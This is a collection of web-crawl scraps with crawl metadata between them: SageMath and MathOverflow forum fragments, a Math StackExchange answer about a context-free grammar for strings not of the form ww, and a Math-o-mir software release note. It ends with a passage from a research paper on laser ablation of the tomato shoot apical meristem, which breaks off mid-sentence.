4*a1*a2*a4^2 + 20*a1*a3*a4^2 - 20/3*a2*a4^3 - 8/3*a3*a4^3 - 1/3*x*y - 2*z*w, 6*a1^2*a2*a3 - 2*a2^3*a3 + 4*a2*a3^3 + 2*a1^3*a4 - 6*a1*a2^2*a4 + 12*a1*a3^2*a4 - 12*a2*a3*a4^2 - 4*a1*a4^3, 2/3*a1^3*a2 - 2/3*a1*a2^3 + 2/3*a1^3*a3 - 2*a1*a2^2*a3 + 4*a1*a2*a3^2 + 4/3*a1*a3^3 - 2*a1^2*a2*a4 + 2/3*a2^3*a4 + 4*a1^2*a3*a4 - 4*a2^2*a3*a4 - 4*a2*a3^2*a4 + 8/3*a3^3*a4 - 4*a1*a2*a4^2 - 4*a1*a3*a4^2 + 4/3*a2*a4^3 - 8/3*a3*a4^3 - 1/3*x*y - 2*z*w, -b1^4 + 6*b1^2*b2^2 - b2^4 - 6*b1^2*b2*b3 + 2*b2^3*b3 - 12*b1^2*b3^2 + 12*b2^2*b3^2 - 4*b2*b3^3 - 4*b3^4 - 2*b1^3*b4 + 6*b1*b2^2*b4 + 48*b1*b2*b3*b4 - 12*b1*b3^2*b4 + 12*b1^2*b4^2 - 12*b2^2*b4^2 + 12*b2*b3*b4^2 + 24*b3^2*b4^2 + 4*b1*b4^3 - 4*b4^4 - 3*x^2 + 3*y^2 - 2*z^2 + 2*w^2, 2/3*b1^3*b2 - 2/3*b1*b2^3 - 10/3*b1^3*b3 + 10*b1*b2^2*b3 + 4*b1*b2*b3^2 - 20/3*b1*b3^3 + 10*b1^2*b2*b4 - 10/3*b2^3*b4 + 4*b1^2*b3*b4 - 4*b2^2*b3*b4 + 20*b2*b3^2*b4 + 8/3*b3^3*b4 - 4*b1*b2*b4^2 + 20*b1*b3*b4^2 - 20/3*b2*b4^3 - 8/3*b3*b4^3 + x*y + 2/3*z*w, 6*b1^2*b2*b3 - 2*b2^3*b3 + 4*b2*b3^3 + 2*b1^3*b4 - 6*b1*b2^2*b4 + 12*b1*b3^2*b4 - 12*b2*b3*b4^2 - 4*b1*b4^3, 2/3*b1^3*b2 - 2/3*b1*b2^3 + 2/3*b1^3*b3 - 2*b1*b2^2*b3 + 4*b1*b2*b3^2 + 4/3*b1*b3^3 - 2*b1^2*b2*b4 + 2/3*b2^3*b4 + 4*b1^2*b3*b4 - 4*b2^2*b3*b4 - 4*b2*b3^2*b4 + 8/3*b3^3*b4 - 4*b1*b2*b4^2 - 4*b1*b3*b4^2 + 4/3*b2*b4^3 - 8/3*b3*b4^3 + x*y + 2/3*z*w] This a $4$-dimensional ideal. The condition "to be nonzero" is not yet added. You might also want to try computing a Gröbner basis with respect to a good monomial ordering (I don't have the computing power right now). (The fractions are there in the equations because absolute_vector_space() uses a basis different from the obvious one, but it doesn't matter.) more 1 "then using the vector space structure of $K$ and changing the ring of the vectors to a polynomial ring in the same variables over $\mathbb{Q}$" Didn't know I could do that, thanks for that idea! ( 2020-02-28 01:20:07 -0500 )edit
2020-06-05 07:06:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3958010673522949, "perplexity": 5585.38856896085}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590348493151.92/warc/CC-MAIN-20200605045722-20200605075722-00266.warc.gz"}
http://mathoverflow.net/questions/119280/is-there-any-heartbeat-like-function/119281
# Is there any heartbeat like function? [closed] I'm looking for a function, where the result is something like this: I tried to figure it out myself, but I have no idea how to manage it. f(x) = ... - ## closed as off topic by Steven Landsburg, Will Sawin, Chris Godsil, Noah Stein, Dan PetersenJan 18 '13 at 17:38 Questions on MathOverflow are expected to relate to research level mathematics within the scope defined by the community. Consider editing the question or leaving comments for improvement if you believe the question can be reworded to fit within the scope. Read more about reopening questions here.If this question can be reworded to fit the rules in the help center, please edit the question. The heart beat function for a dead guy is defined by $f(x)=0.$ – Joseph Van Name Jan 19 '13 at 0:02 Hodgkin-Huxley gives a system of differential equations whose solutions look pretty close. As in the normal pattern is a limit cycle. – AHusain Apr 25 at 21:46
2016-07-01 17:12:00
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4142231047153473, "perplexity": 558.1252127961678}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783403508.34/warc/CC-MAIN-20160624155003-00050-ip-10-164-35-72.ec2.internal.warc.gz"}
https://math.stackexchange.com/questions/2171178/understanding-the-context-free-grammar-of-the-following-language
Understanding the context free grammar of the following language The set of all strings over alphabet a,b not of the form ww for any w. No strings of odd length can be of the form ww . We use the terminal symbols A and B to generate all odd-length strings where the center characters are a and b, respectively. S -> AB|BA|A|B A -> aAa|aAb|bAa|bAb|a B -> aBa|aBb|bBa|bBb|b To understand why AB and BA are guaranteed to generate strings not of the form ww, understand that A builds an odd-length string, say of length 2k + 1, where k characters precede an a which preceds k more characters. Similarly, B generates a string, say of length 2m + 1, where m a's and b's precede one b preceds m more a's and b's. If we concatenate one to another, we get a string of length 2k + 2m + 2:an even length string-where the middle a of the portion generated by A is k + m + 1 characters away from the central b generated by B. That means that the first k + m + 1 characters cannot be fully replicated in the final k + m + 1 characters. The first question I have about this proof is that I think they are just intending to generate all the strings of odd length, but there are also strings of even length not in the form ww. Can you explain in an easier way why does that grammar works? • Since $A$ and $B$ both generate strings of odd length, the productions $S\to AB$ and $S\to BA$ generate strings of even length. You have quoted an argument that the even-length strings generated by $AB$ and $BA$ are exactly the ones that are not of the form $ww$. What do you find unclear about this argument? – hmakholm left over Monica Mar 4 '17 at 10:15 Let $L(G)$ be the language which can be derived from the given grammar $G$ $$S \to AB \mid BA \mid A \mid B \\ A \to aAa \mid aAb \mid bAa \mid bAb \mid a \\ B \to aBa \mid aBb \mid bBa \mid bBb \mid b \\$$ and the desired language $L$ be $$L = \Sigma^* \setminus L' \\ \Sigma = \{ a, b \} \\ L' = \{ ww \mid w \in \Sigma^* \}$$ The nonterminals $A$ and $B$ each end up in words of odd length. They seem to derive all possible odd length words from $L$: A rule $$X \to a X a \mid a X b \mid b X a \mid b X b \mid x$$ grows a word $w$ by one of the four possible steps to grow by two symbols each, and finishes on a central symbol $x$, So $\lvert w \rvert = 2 k + 1$ with $k \in \mathbb{N}_0$. This leaves the even length words from $L$: $S$ can turn into $AB$ or $BA$ which gives words $uv$ or $vu$, where $u$ and $v$ are of odd length, note that $u$ and $v$ must not have the same length. To understand why $AB$ and $BA$ are guaranteed to generate strings not of the form $ww$, understand that $A$ builds an odd-length string, say of length $2k + 1$, where $k$ characters precede an $a$ which preceds $k$ more characters. Similarly, $B$ generates a string, say of length $2m + 1$, where $m$ $a$s and $b$s precede one $b$ preceds $m$ more $a$ and $b$. If we concatenate one to another, we get a string of length $2k + 2m + 2$: an even length string-where the middle $a$ of the portion generated by $A$ is $k + m + 1$ characters away from the central $b$ generated by $B$. That means that the first $k + m + 1$ characters cannot be fully replicated in the final $k + m + 1$ characters. This explains the application of $S \to AB$, giving a word $$(a\mid b)^k \, \underbrace{a \, (a \mid b)^k \, (a \mid b)^m}_{1+k+m} b (a \mid b)^m \in \Sigma^{k+1+k+m+1+m} \\$$ with $k, m \in \mathbb{N}_0$. Comparing this with an equal length string of the form $ww$: $$\overbrace{x_1 \dotsb x_{k+m+1}}^w \, \overbrace{x_1 \dotsb x_{k+m+1}}^w$$ The requested repetition of $w$ boils down to the condition $$(ww)_i = x_i = (ww)_{i + k+m+1} \quad (i \in \{1,\dotsc,k+m+1\}) \quad (*)$$ We know the central $a$ of the $A$ production is at position $k+1 \le k+1+m$ thus in the first half, and the central $b$ of the $B$ production is at position $k+1+k+m+1 > k+m+1$, thus in the second half. And that condition $(*)$ is not met, as $$(ww)_{k+1} = a \ne (ww)_{k+1+k+m+1} = b$$ A similar argumentation will hold for the words derived from $S\to BA$. What is left open is, if these two productions give all even length words from $L$, $L(G)$ might just be a proper subset of $L$. • .........-> means I got it. – daniel Mar 16 '17 at 21:55
2020-02-17 19:36:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6552159190177917, "perplexity": 290.1058322130263}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875143079.30/warc/CC-MAIN-20200217175826-20200217205826-00033.warc.gz"}
https://mathomir.wordpress.com/2011/12/06/math-o-mir-v1-62-released-the-velociraptor/
I released the v1.62 and you can download it from the homepage.  This version is nicknamed “the velociraptor” because it is the fastest blackboard-to-computer math writing tool in the world. (Lucky me.) Keyboard handling news: • You can now use ALT+Space (or SHIFT+Space) to toggle  between math-typing and text-typing mode. This way you can easily mix math and a plain text while you are typing your artwork. • Toolbox accelerator table is expanded with new shortcuts. It also shows already-used shortcuts now. • The comma character can be used as a decimal separator now. To make this possible, check the following option “Options->Keyboard->Allow comma as a decimal separator”. • You can quickly save your document by using CTRL+S keystroke (As a result, the single-shot formatting is renamed to one-shot formatting and is activated by the  CTRL+O keystroke) • You can now add a ‘hat’ over a variable you just entered by using the double ‘^’ stroke. You can add an arrow by using ALT+comma… (strange, isn’t it?) • You can use following keystrokes \{, $, $$, \|, \},$,$$ to insert a single bracket only. • Triple (!!!) ALT+right keystroke inserts the |-> operator. Further, using the ‘=>’ keystroke you can insert double right arrow. Using ‘***’ keystroke you can enter center-dots. • The \ep command is implemented as a short form for the \epsilon command. The \mid command is also implemented. • When working with keyboard selections you can use following keystrokes now: b (bold), i (italic), u (underline), o (overline), s (strikeout), r (red), g (green), n (formatting normalization) • Following parentheses-generating keystrokes are enabled: ‘<>’ , ‘[)’, ‘(]’, ‘||’ • You can add + or – sign to the exponent by using ALT+plus and ALT+minus keystrokes. Other news: • analysis button for function plotting – shows local minimum, maximum and intersection points • New functions can be plotted now: sec, cosec, arcsin, arccos, arctan, arccot, sh, ch, th, cth • You can point at the moving dot now to select the whole object • You can copy equation images to other applications by using standard Copy/Paste menu options • New operators are added:   :=, =:, :<=>, #, |-> • The F2 key (zoom in) will now follow your mouse pointer if mouse was moved in less than one second prior to the F2 usage. • The mouse wheel will scroll the window when mouse pointer hovers over vertical scroll bar • I addition, you can now dedicate mouse wheel to window scrolling – in this case you must use CTRL+wheel for zoom in/out. To make this option active check the  “View->Zoom->Use CTRL for wheel zoom” menu option. • “Wide keyboard cursor” option makes your blinking cursor fat so you can see it better. Use “Options->Selections->Wide keyboard cursor” • Automatic vertical guidelines – when your mouse pointer is nearly aligned with the left side of an equation, a thin green lines will appear. To toggle the guidelines on/off use the F12 key. • There is a new HTML help file.
2018-01-23 13:36:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4387955069541931, "perplexity": 8260.35772156185}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084891976.74/warc/CC-MAIN-20180123131643-20180123151643-00532.warc.gz"}
https://cob.silverchair.com/dev/article/130/17/4073/52262/Microsurgical-and-laser-ablation-analysis-of?searchresult=1
Plants exhibit life-long organogenic and histogenic activity in a specialised organ, the shoot apical meristem. Leaves and flowers are formed within the ring-shaped peripheral zone, which surrounds the central zone, the site of the stem cells. We have undertaken a series of high-precision laser ablation and microsurgical tissue removal experiments to test the functions of different parts of the tomato meristem, and to reveal their interactions. Ablation of the central zone led to ectopic expression of the WUSCHELgene at the periphery, followed by the establishment of a new meristem centre. After the ablation of the central zone, organ formation continued without a lag. Thus, the central zone does not participate in organogenesis, except as the ultimate source of founder cells. Microsurgical removal of the external L1 layer induced periclinal cell divisions and terminal differentiation in the subtending layers. In addition, no organs were initiated in areas devoid of L1, demonstrating an important role of the L1 in organogenesis. L1 ablation had only local effects, an observation that is difficult to reconcile with phyllotaxis theories that invoke physical tension operating within the meristem as a whole. Finally, regeneration of L1 cells was never observed after ablation. This shows that while the zones of the meristem show a remarkable capacity to regenerate after interference, elimination of the L1layer is irreparable and causes terminal differentiation. The shoot apical meristem (SAM) serves as a source of cells for organ formation during postembryonic growth. In order to fulfil this function over years (or centuries in trees), the meristem has to maintain a separate population of cells that serve for self maintenance. The two functions of the meristem, organ formation and self maintenance, are associated with different areas of the meristem (Steeves and Sussex,1989; Lyndon,1998). Stem cells are located in the central zone (CZ). Owing to their cell division activity, daughter cells are continuously displaced from the centre towards the peripheral zone (PZ) at the flank where they become competent to form organs. Considering the dynamic properties of the meristem,the maintenance of meristem integrity requires precise coordination of cell division, cell expansion and differentiation (for reviews, see Fletcher, 2002; Weigel and Jürgens, 2002; Gross-Hardt and Laux,2003). Genetic analysis in Arabidopsis and Petunia has identified the WUSCHEL (WUS) and CLAVATA(CLV) genes as key players in the specification and maintenance of stem cells (Clark et al., 1997; Mayer et al., 1998; Fletcher et al., 1999; Brand et al., 2000; Stuurman et al., 2002). WUS is expressed in a cell cluster in the CZ, several cell layers below the summit. WUS function induces stem cell identity in the overlying cells of the CZ. Because of this inductive role, the WUS-expressing cell cluster is referred to as the organising centre(OC) of the meristem (Mayer et al.,1998). A negative feedback loop limits WUS expression,thereby preventing accumulation of excess stem cells (for reviews, see Simon, 2001; Fletcher, 2002; Gross-Hardt and Laux, 2003). This negative regulation requires the function of the CLAVATA (CLV) signalling pathway. CLV3 peptide ligand produced by the stem cells, is perceived by the CLV1 receptor kinase which is expressed in the cells below the stem cells. Superimposed on the functional subdivision in CZ and PZ, the meristem is organised in layers (Steeves and Sussex,1989; Lyndon,1998). The external L1 layer covers the subepidermal L2 layer and the remaining internal tissues, referred to as L3. The layered organisation of the meristem is maintained by stereotyped cell division patterns in L1 and L2. This leads to separated cell lineages that can be maintained for years(Tilney-Basset, 1986). Although the layered organisation of the meristem is found in virtually all angiosperms, its functional relevance is still unclear. Since the three meristem layers cooperate in organ formation, some sort of communication is required to coordinate their development(Szymkowiak and Sussex, 1996). Most information on layer interactions comes from analysis of periclinal chimeras in which one or two of the meristem layers are mutant, and the remaining layer(s) wild type. Such studies have revealed extensive communication between the layers. For example, in tomato flowers the number and the size of organs is largely determined by the interior layers(Szymkowiak and Sussex, 1992; Szymkowiak and Sussex, 1993). Conversely, in flowers of an Antirrhinum periclinal chimera, the wild-type L1 layer could restore the mutant phenotype in the interior layers of floricaula mutants(Hantke et al., 1995). In this case, the L1 layer induced the complete developmental program in L2 and L3 to give rise to fertile flowers. Such inductive interactions between meristem layers are reminiscent of induction between the three germ layers in animal embryogenesis(Gilbert, 2000). Mutants have provided a wealth of information on intercellular interactions in the meristem (Simon, 2001; Fletcher, 2002; Gross-Hardt and Laux, 2003). However, in many cases, the phenotypes of meristem mutants are pleiotropic,and in some mutants such as wuschel or shoot meristemless, a normal meristem is never established (Long et al., 1996; Mayer et al.,1998). This limits the use of such mutants for studies on dynamic intercellular interactions. In such cases, it is helpful to induce controlled lesions that are limited temporally and spatially. Physical ablation of cells has successfully been employed to reveal cell-to-cell communication in the root meristem (van den Berg et al.,1995; van den Berg et al.,1997). The advantage of such experiments is that they start from a normal meristem which can, after experimental interference, reorganise itself according to the natural regulatory mechanisms. Classical microsurgical experiments have shown that needle pricking of the CZ did not lead to meristem arrest(Pilkington, 1929; Loiseau, 1959; Sussex, 1964). In all these studies, some kind of regeneration was reported; however, the results and their interpretation differed considerably. Pilkington mentions briefly that after pricking of the centre regeneration followed in nearly every case'(Pilkington, 1929). Loiseau gives a detailed description of the peripheral expansion, the regeneration of several new meristem centres and of fasciations after destruction of the CZ(Loiseau, 1959). He takes these results as evidence for the importance of the PZ, and for the dispensability of the CZ (La destruction des cellules apicales n'interrompt pas le fonctionnement de l'apex; ces cellules ne sont donc pas indispensables'). Finally, Sussex reports that after puncturing of the apexaxial growth ceased and one of the apical flanks grew out as the new meristem' (Sussex, 1964). Despite the initial differences in interpretation, these classical studies have led to the widely accepted notion that destruction of the meristem centre leads to the establishment of one or more new growth centres at the periphery(Steeves and Sussex, 1989). It is of considerable interest to interpret the surgical experiments in the framework of the recent molecular models, and vice versa. With this in mind,we revisited the classical surgical experiments. We used technical innovations from the last half-century, such as tissue culture, high-resolution stereo light and scanning electron microscopy, and laser-based ablation techniques to increase the temporal and spatial resolution of the experiments. In addition,a number of control experiments support the notion that the effects induced by the ablations are not a general stress response but specifically shed light on endogenous developmental processes. Moreover, we monitored the expression of key developmental genes after the microsurgical manipulations and thereby enable a link to be made between the two types of experimental approaches. ### Plant growth, in vitro culture and treatment of apices Tomato plants (Lycopersicon esculentum cv Moneymaker) were grown as described previously (Reinhardt et al.,1998). Shoot apices were dissected and cultured as described previously (Fleming et al.,1997) on Murashige and Skoog (MS) medium containing 0.01 μM giberellic acid A3 (Fluka, Switzerland) and 0.01 μM kinetin(Sigma). Salicylic acid (Sigma), jasmonic acid (Sigma), hydrogen peroxide(Fluka) and Paraquat (1,1′-dimethyl-4,4′-bipyridinium dichlorid;Fluka) were diluted in DMSO to give 100× stock solutions. These were diluted directly in prewarmed (60°C) lanolin containing 3% w/w paraffin(Merck), and applied manually with yellow plastic pipette tips. After chemical treatments and laser ablation, apices were further cultured on synthetic medium. ### Laser ablations Ablation of the meristem was conducted with a Q-switched Er:YAG laser that emits infrared radiation at a wavelength of 2.94 μm. Er:YAG laser radiation shows a high ablation efficiency and precision, which, by virtue of the high absorption coefficient in water (absorption coefficient is about 10,000 cm-1, corresponding to an optical penetration depth of approximately 1 μm), leads to thermally damaged zones adjacent to the ablation side that are restricted to a few micrometers(Frenz et al., 1996). Q-switching was performed by a FTIR-modulator as described previously(Könz et al., 1993). The pulse duration was 60 nseconds. The laser was operated at a repetition rate of 2 Hz. The radiation was guided from the laser to the operating microscope through an optical sapphire fibre with a core diameter of 125 μm and focused with a lens system to a spot of approximately 40 μm in diameter on the surface of the meristem. The pulse energy used was 0.3 mJ for ablation of the L1 layer (one pulse applied), and 1.5 mJ for deeper ablations(1 pulse for the ablation of the stem cells, and 10 consecutive pulses for the ablation of the entire CZ). ### Cloning of LeWUS A cDNA library was constructed using mRNA isolated from tomato meristems and the SMART library kit (Clontech). A 350 bp fragment of the LeWUSgene was obtained by polymerase chain reaction (PCR) on DNA from the meristem library using Triplex F primer (Clontech) and the WUS4R primer(5′-GCCTTCAATCTTTCCGTACTGTCT-3′), which matches the conserved region of the Petunia PhWUS gene(Stuurman et al., 2002)(GenBank accession number AF481951). Based on sequence information from the 350 bp fragment, we designed the WUS10F primer(5′-CAACACAACATAGAAGATGGTGG-3′). A 1200 bp fragment amplified with the primers WUS10F and Triplex R (Clonetech) was cloned into pBluescript and used for generating 35S-labelled riboprobes. The sequence of LeWUS was deposited in GenBank (accession number AJ538329). ### In situ hybridisation and microscopy In situ hybridisations were carried out either with 35S-labelled riboprobes as described by Reinhardt et al.(Reinhardt et al., 1998), or with dig-labelled riboprobes according to the method of Vernoux et al.(Vernoux et al., 2000). Silver grain signal was visualised on a Zeiss LSM310 confocal microscope as described previously (Reinhardt et al.,1998), and appears as yellow grains on a blue background. For scanning electron microscopic analysis, apices were viewed with an S-3500N variable pressure scanning electron microscope from Hitachi (Tokyo, Japan),equipped with a cool stage. In digital images lanolin paste was pseudocoloured for clarity. For live imaging, developing tomato apices were cultured on plates and repeatedly photographed with a Sony DKC-5000 digital camera mounted on a Nikon SMZ-U stereoskope. Plastic sections were prepared as described previously (Loreto et al.,2001) with one modification: OsO4 was omitted. Semithin sections (5 μm) were viewed on a Zeiss Axioskop2 equipped with an Axiocam camera. ### Laser ablation at the meristem The shoot apical meristem is organised in a central zone (CZ; Fig. 1A,B, light blue) that harbours the stem cells (dark blue), and in a peripheral zone (PZ, yellow) in which organ formation takes place. Superimposed on this functional subdivision into CZ and PZ, the meristem is organised in three cell layers (L1,L2 and L3) that are clonally separated because of their stereotyped cell division patterns (Fig. 1B). In L1 and L2, the cells divide anticlinally, i.e. both daughter cells remain in the original layer, whereas in L3, cell divisions occur in all planes. The three layers cooperate in organ formation (Fig. 1B, arrowhead). In the CZ, a population of cells that expresses the WUSCHEL gene (red) induces stem cell identity in the above cells(Mayer et al., 1998), and therefore, is referred to as the organising centre (OC). Whereas the CZ includes all undifferentiated cells distal to the region of primordium formation, the stem cells constitute only the small cell population at the summit. Each meristem layer has a few stem cells [1-3 stem cells per layer as estimated by Stewart and Dermen (Stewart and Dermen, 1970)], consequently, the meristem contains a total set of up to 10 stem cells. Fig. 1. Organisation of the shoot apical meristem, and schematic representation of the ablations performed in this study. (A) SEM micrograph of a vegetative shoot apical meristem of tomato. P3, P2 and P1 indicate young primordia. P1 is just being initiated at the flank. (B-F) Schematic representation of a meristem as in A. (B) The meristem consists of the central zone (CZ, light blue) that harbours the stem cells (dark blue) and the peripheral zone (PZ, yellow) in which organs are formed. An organising centre that expresses the marker gene LeWUS(red) induces stem cell identity in the above cells. Superimposed on the zonation (CZ and PZ), the meristem is organised in layers, namely the external L1 layer, the subepidermal L2 layer and the remaining cells, called L3. All three layers cooperate in organ formation(arrowhead). (C) Ablation of the entire CZ. (D) Ablation of the stem cells.(E) Ablation of the L1 layer in the CZ. (F) Ablation of the entire L1 layer. Scale bar: 100 μm. Fig. 1. Organisation of the shoot apical meristem, and schematic representation of the ablations performed in this study. (A) SEM micrograph of a vegetative shoot apical meristem of tomato. P3, P2 and P1 indicate young primordia. P1 is just being initiated at the flank. (B-F) Schematic representation of a meristem as in A. (B) The meristem consists of the central zone (CZ, light blue) that harbours the stem cells (dark blue) and the peripheral zone (PZ, yellow) in which organs are formed. An organising centre that expresses the marker gene LeWUS(red) induces stem cell identity in the above cells. Superimposed on the zonation (CZ and PZ), the meristem is organised in layers, namely the external L1 layer, the subepidermal L2 layer and the remaining cells, called L3. All three layers cooperate in organ formation(arrowhead). (C) Ablation of the entire CZ. (D) Ablation of the stem cells.(E) Ablation of the L1 layer in the CZ. (F) Ablation of the entire L1 layer. Scale bar: 100 μm. Previous experiments indicated that after ablation of single cells in the L1 layer, the dead cells were gradually displaced from the meristem without further consequences for meristem development (M. Muster and C.K.,unpublished). Therefore, we wanted to ablate larger cell populations such as the entire CZ (Fig. 1C), the distal part of the CZ (Fig. 1D)or only the L1 layer (Fig. 1E,F). To achieve this, we connected an infrared laser to an optic fibre and a lens that focused the beam to a spot of approximately 40 μm in diameter. This set-up allowed us to ablate groups of cells simultaneously and to vary the energy in a wide range. Repeated high energy pulses at the same spot ablated the entire CZ (Fig. 1C), whereas single high energy pulses ablated only the 4-5 most superficial cell sheets in the CZ (Fig. 1D; see Materials and Methods). To generate superficial lesions of only L1 cells (Fig. 1E), single ablations at low energy were performed. For the ablation of the entire L1 layer(Fig. 1F), we developed a microsurgical technique (see below). ### Ablation of the central zone does not affect organ formation but leads to the establishment of a new meristem centre To reveal the function of the CZ in organ formation and meristem maintenance, we generated lesions in the meristem centre that were approximately 40 μm wide and 100 μm deep (compare to a meristem diameter of approximately 150 μm). (Fig. 2A,C,D). These lesions eliminated the CZ including the LeWUS-expressing cells in the L3 layer, which is located approximately 50 μm below the summit of the meristem(Fig. 2B, compare with Fig. 3A,B). After such ablations, leaf formation continued without delay(Fig. 2E,G,I). Primordium initiation rate may even have been slightly higher than in control apices,i.e. after 3 days, apices with lesions had formed 1.95±0.4 (s.d.) new primordia (n=15) compared to 1.54±0.29 (s.d.) new primordia in controls (n=7). Also, the position of new primordia was normal, i.e. new primordia diverged from the next older primordia by approximately 137°. In general, the hole closed within 2 days(Fig. 2F). Later, the lesions were, in most cases, gradually displaced from the meristem centre (16 out of 22; Fig. 2G,H,I). We presume that this displacement was caused by the activation of a new meristem centre at the flank. In 3 out of 22 cases, two new centres were initiated concomitantly at opposite sides of the lesion, resulting in the split of the meristem (Fig. 2J). In such cases, leaf position sometimes becomes irregular(Fig. 2J; Fig. 3G). In the remaining cases (3 out of 22), the lesion remained on the meristem. These results show that after elimination of the entire CZ, including the LeWUS-expressing cells, organ formation continued without an obvious lag. Fig. 2. Organ formation and meristem maintenance after ablations of the CZ. Yellow arrowheads indicate the position of the lesion. (A) Longitudinal section through a meristem immediately after ablation. The ablation eliminated the entire CZ and projected more than 100 μm into the meristem. (B)Longitudinal section through a control meristem hybridised with a dig-labelled antisense probe against LeWUS. The signal in the meristem centre appears brown. (D,F,H) Transverse sections; (C,E,G,I,J) scanning electron micrographs. (C) Scanning electron micrograph of a meristem with ablated CZ,in top view. (D) Transverse section of a meristem after ablation of the CZ.(E-J) Development of the meristem after ablation of the CZ. After 2 days, a new primordium was formed at the expected site (E), and the hole closed (F). After 4 days, four new primordia had been formed (G), the lesion was displaced from the centre towards the flank, and a new meristem centre (star) was established (G,H). After 6 days, the lesion was removed from the meristem and displaced onto the stem (I), or two new meristem centres had been established on either side of the lesion (J). P3, P2, and P1 indicate leaf primordia that were present at the beginning of the experiment; I1, I2, I3, and I4indicate primordia formed after the ablation. In some cases, primordia were removed to allow manipulation or visualisation. Scale bars: 100 μm. Fig. 2. Organ formation and meristem maintenance after ablations of the CZ. Yellow arrowheads indicate the position of the lesion. (A) Longitudinal section through a meristem immediately after ablation. The ablation eliminated the entire CZ and projected more than 100 μm into the meristem. (B)Longitudinal section through a control meristem hybridised with a dig-labelled antisense probe against LeWUS. The signal in the meristem centre appears brown. (D,F,H) Transverse sections; (C,E,G,I,J) scanning electron micrographs. (C) Scanning electron micrograph of a meristem with ablated CZ,in top view. (D) Transverse section of a meristem after ablation of the CZ.(E-J) Development of the meristem after ablation of the CZ. After 2 days, a new primordium was formed at the expected site (E), and the hole closed (F). After 4 days, four new primordia had been formed (G), the lesion was displaced from the centre towards the flank, and a new meristem centre (star) was established (G,H). After 6 days, the lesion was removed from the meristem and displaced onto the stem (I), or two new meristem centres had been established on either side of the lesion (J). P3, P2, and P1 indicate leaf primordia that were present at the beginning of the experiment; I1, I2, I3, and I4indicate primordia formed after the ablation. In some cases, primordia were removed to allow manipulation or visualisation. Scale bars: 100 μm. Fig. 3. Expression of the meristem marker genes LeWUS and LeT6 in the meristem after ablation of the CZ. Gene expression was visualised by in situ hybridisation with 35S-labelled riboprobes. Signal appears as yellow grains. All images are transverse sections, except for I and J which are longitudinal sections. Position of the lesion is indicated by yellow arrowheads. (A-G) Expression of LeWUS. (H-L) Expression of LeT6. (A) Expression of LeWUS in a control meristem. (B)Expression of LeWUS immediately after ablation of the CZ (yellow arrowhead). No LeWUS expression can be detected. (C) Expression of LeWUS 1 day after ablation of the CZ. A ring-shaped area around the lesion expresses LeWUS at low levels (arrows). (D) Expression of LeWUS 2 days after ablation of the CZ. The lesion (arrowhead) is closed, and the LeWUS signal becomes confined to one side of the lesion. (E) Expression of LeWUS 4 days after ablation of the CZ. The LeWUS-expressing zone at the flank has resolved into a new WUS centre with normal dimensions (compare with A). (F) Expression of LeWUS 6 days after ablation of the CZ. A new functional meristem centre with a normal WUS centre has been 